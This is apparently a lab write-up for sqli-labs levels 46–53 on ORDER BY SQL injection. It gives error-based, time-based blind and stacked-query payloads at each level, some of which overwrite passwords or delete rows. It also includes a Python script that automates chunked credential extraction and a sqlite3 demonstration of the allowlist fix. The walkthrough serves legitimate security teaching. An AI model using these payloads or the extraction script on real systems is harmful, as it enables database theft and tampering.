SQL Lab (46~53) (continuous update later) order by injection
2022-07-07 12:24:00 【hcjtn】
(46~50)
sql-lab-46
Opening level 46, the page immediately tells us to use the sort parameter:
Try ?sort=1:
then ?sort=2:
?sort=3:
With sort=1 the table is ordered by its first column, with sort=2 by the second column and with sort=3 by the third. That is exactly what ORDER BY does, so the injection point is probably an ORDER BY clause.
View source code :
$sql = "SELECT * FROM users ORDER BY $id";
The source confirms the guess.
What ORDER BY injection means:
ORDER BY injection is an injection where the argument that follows ORDER BY is controlled by us.
It differs from an injection point after WHERE: whatever we append lands after ORDER BY, where UNION and similar statements are a syntax error, so the usable techniques are error-based injection and time-based blind injection. (ORDER BY accepts any expression, so a boolean condition can also be turned into a visible change of sort order, e.g. ORDER BY IF(cond, id, username), but this page sticks to errors and delays.) In every payload below the trailing -- q is a comment: MySQL only treats -- as a comment when a space follows it, and the q is a visible filler that keeps that space from being dropped.
Database name: ?sort=-1 and updatexml(1,concat(0x7e,database(),0x7e),1)-- q
Table name: ?sort=-1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)-- q
Column name: ?sort=-1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)-- q
Data: ?sort=-1 and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q
Note that MySQL truncates the XPATH error message to 32 characters, so longer values (a group_concat of tables, a password list) have to be read in pieces with substr().
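The four steps above are one procedure: put an expression into updatexml(), read it back from the XPATH error, and repeat with substr() when the value is longer than the 32-character window. The script below is an added example, not code from the original post, that automates that loop for level 46 (no quote) and level 47 (closing quote). It runs offline against a constructed stand-in for the lab server (fake_lab_server, FAKE_RESULTS and the credential string are all made up here and reproduce only the 32-character truncation); http_sender() is the sender to swap in for a real instance, and its URL is an assumption.

```python
import re
from urllib.parse import quote
from urllib.request import urlopen

# Constructed stand-in for what the lab's MySQL would return for a few
# subqueries; the credential list is made up here, it is not lab data.
CREDS_EXPR = "select group_concat(concat(username,0x3a,password)) from users"
FAKE_RESULTS = {
    "database()": "security",
    "select group_concat(table_name) from information_schema.tables where table_schema='security'":
        "emails,referers,uagents,users",
    CREDS_EXPR: "Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword",
}

def fake_lab_server(sort, closing=""):
    """Simulates Less-46 (closing='') / Less-47 (closing="'") for the one payload
    shape built below. MySQL truncates the XPATH error string to 32 characters;
    that truncation is reproduced here because it is the reason for the chunking."""
    pat = (r"-1" + re.escape(closing)
           + r" and updatexml\(1,concat\(0x7e,substr\(\((.+)\),(\d+),(\d+)\)\),1\)-- q")
    m = re.fullmatch(pat, sort)
    if not m:
        return "<html>You have an error in your SQL syntax</html>"
    expr, pos, n = m.group(1), int(m.group(2)), int(m.group(3))
    if expr not in FAKE_RESULTS:
        return "<html>Unknown column</html>"
    piece = FAKE_RESULTS[expr][pos - 1:pos - 1 + n]   # MySQL substr() is 1-based
    return f"<html>XPATH syntax error: '{('~' + piece)[:32]}'</html>"

ERR_RE = re.compile(r"XPATH syntax error: '~([^']*)'")

def extract_via_updatexml(send, expr, closing="", chunk=31):
    """Pull the full value of `expr` out through updatexml() error messages.
    A leading 0x7e plus 31 payload characters fills the 32-character window;
    a window shorter than `chunk` means the value has been read to its end."""
    out, pos = "", 1
    while True:
        sort = (f"-1{closing} and updatexml(1,concat(0x7e,"
                f"substr(({expr}),{pos},{chunk})),1)-- q")
        m = ERR_RE.search(send(sort))
        if not m:
            raise RuntimeError("no XPATH error in the response to: " + sort)
        piece = m.group(1)
        out += piece
        if len(piece) < chunk:
            return out
        pos += chunk

def http_sender(base_url):
    """Sender for a real instance, e.g. base_url='http://127.0.0.1/sqli-labs/Less-46/'
    (assumed path). Percent-encoding keeps the space that the '-- ' comment needs."""
    return lambda sort: urlopen(base_url + "?sort=" + quote(sort, safe="")).read().decode(errors="replace")

if __name__ == "__main__":
    offline = lambda sort: fake_lab_server(sort)
    print(extract_via_updatexml(offline, "database()"))
    print(extract_via_updatexml(offline, CREDS_EXPR))
```

The 44-character credential string takes two requests (31 characters, then the remaining 13); the database name fits in one. With the wrong closing quote every response is a plain syntax error and extract_via_updatexml() raises, which is the cue to go back and work out the closure first.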
sql-lab-47
Same principle as 46; the only difference is the closure: here the parameter is wrapped in single quotes, so each payload first closes the quote with '.
Database name: ?sort=-1' and updatexml(1,concat(0x7e,database(),0x7e),1)-- q
Table name: ?sort=-1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)-- q
Column name: ?sort=-1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)-- q
Data: ?sort=-1' and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q
sql-lab-48
This level prints no error messages, so error-based injection is out and only time-based blind injection is left. Each request asks one yes/no question; a 5-second delay is the answer "yes":
Database name: ?sort=1 and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q   (delays, so the first character is 's', as in security)
Table name: ?sort=1 and if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101),sleep(5),1)-- q   (first character is 'e', as in emails)
Column name: ?sort=1 and if((ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1))=105),sleep(5),1)-- q   (first character is 'i', as in id)
Data: ?sort=1 and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q
The parameter here is numeric, so nothing is closed before and: a stray ' would make the query a syntax error and no delay would ever come back, which looks exactly like "false" for every guess.
sql-lab-49
Same as level 48; the only difference is the closure, which is again a single quote.
Database name: ?sort=1' and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q   (first character is 's')
Table name: ?sort=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101),sleep(5),1)-- q   (first character is 'e')
Column name: ?sort=1' and if((ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1))=105),sleep(5),1)-- q   (first character is 'i')
Data: ?sort=1' and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q
sql-lab-50
Opening level 50, it looks quite different from the previous levels. Our input is still concatenated after ORDER BY, so error-based injection should still work, and a quick test confirms it does. So what is different about this level?
Look at the source:
mysqli_multi_query($con1, $sql)
mysqli_multi_query() runs every ';'-separated statement in the string, so this level combines stacked injection with ORDER BY injection. The statements after the ';' produce no output on the page; their effect has to be verified separately, for example by reading the changed row back with the error-based payloads from level 46.
?sort=1;update users set password='hcjtn' where id=14-- q
?sort=1;insert into users values(50,'50','50')-- q
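To see why mysqli_multi_query() turns a sort parameter into a write primitive, and what the fix looks like, here is an added example that is not part of the original post or of sqli-labs. It models the level-50 query with Python's sqlite3: executescript() plays the part of mysqli_multi_query() (every ';'-separated statement runs), the users table and its rows are constructed here, and the two payloads are the ones from the post. The hardened version shows the correct fix for a sortable column: ORDER BY cannot take a bound parameter (a placeholder would sort by a constant), so the user value is mapped through an allowlist and the raw string never reaches the SQL.

```python
import sqlite3

# Constructed rows, only loosely modelled on the lab's users table.
SEED_USERS = [
    (1, "Dumb", "Dumb"),
    (2, "Angelina", "I-kill-you"),
    (3, "Dummy", "p@ssword"),
    (14, "admin", "admin"),
]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SEED_USERS)
    conn.commit()
    return conn

def vulnerable_sort(conn, sort):
    """Less-50 shape: the raw parameter lands after ORDER BY and the whole string
    goes to a multi-statement executor. executescript() stands in for
    mysqli_multi_query(): everything after a ';' is executed as well."""
    conn.executescript(f"SELECT * FROM users ORDER BY {sort}")

# Allowlist: the only values the sort parameter may take, and the column each maps to.
SORT_COLUMNS = {"1": "id", "2": "username", "3": "password"}

def sort_param_accepted(sort):
    return str(sort) in SORT_COLUMNS

def hardened_sort(conn, sort):
    """Fixed version: map the parameter to a known column name, reject anything
    else, and run a single statement through the ordinary execute() API."""
    column = SORT_COLUMNS.get(str(sort))
    if column is None:
        raise ValueError(f"unsupported sort value: {sort!r}")
    return conn.execute(f"SELECT id, username, password FROM users ORDER BY {column}").fetchall()

def password_of(conn, uid):
    row = conn.execute("SELECT password FROM users WHERE id = ?", (uid,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    conn = make_db()
    vulnerable_sort(conn, "1;update users set password='hcjtn' where id=14-- q")
    print("id 14 password after stacked update:", password_of(conn, 14))
    print("hardened accepts the same payload?", sort_param_accepted("1;update users set password='hcjtn' where id=14-- q"))
```

The same allowlist approach applies to any identifier a user may choose (column, table, ASC/DESC): keep a small map from the accepted parameter values to the literal SQL fragments and never interpolate the request value itself.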
(51~53)
sql-lab-51
Same approach as the previous level; the only difference is the closure, which is a single quote.
Either error-based or time-based blind injection works:
Error-based injection is used here:
Database name: ?sort=-1' and updatexml(1,concat(0x7e,database(),0x7e),1)-- q
Table name: ?sort=-1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)-- q
Column name: ?sort=-1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)-- q
Data: ?sort=-1' and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q
Then stacked injection:
?sort=1';insert into users values(21,'02','24')-- q
sql-lab-52
Same routine, same method. First work out the closure: this level has none, the parameter is numeric. Then try error-based injection to pop the database name: it does not work, errors are not displayed, so only time-based blind injection is left here:
Database name: ?sort=1 and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q   (first character is 's')
Table name: ?sort=1 and if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101),sleep(5),1)-- q   (first character is 'e')
Column name: ?sort=1 and if((ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1))=105),sleep(5),1)-- q   (first character is 'i')
Data: ?sort=1 and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q
Then stacked injection (again nothing is printed, so the deletion has to be confirmed with a follow-up blind query):
?sort=1;delete from users where id=50-- q
sql-lab-53
First work out the closure: the payloads that respond are the ones starting with a single quote, so the parameter is wrapped in quotes and each payload closes it with '. Errors are not displayed, so it is time-based blind injection again:
Database name: ?sort=1' and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q   (first character is 's')
Table name: ?sort=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101),sleep(5),1)-- q   (first character is 'e')
Column name: ?sort=1' and if((ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1))=105),sleep(5),1)-- q   (first character is 'i')
Data: ?sort=1' and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q
Then stacked injection:
?sort=1';delete from users where id=50-- q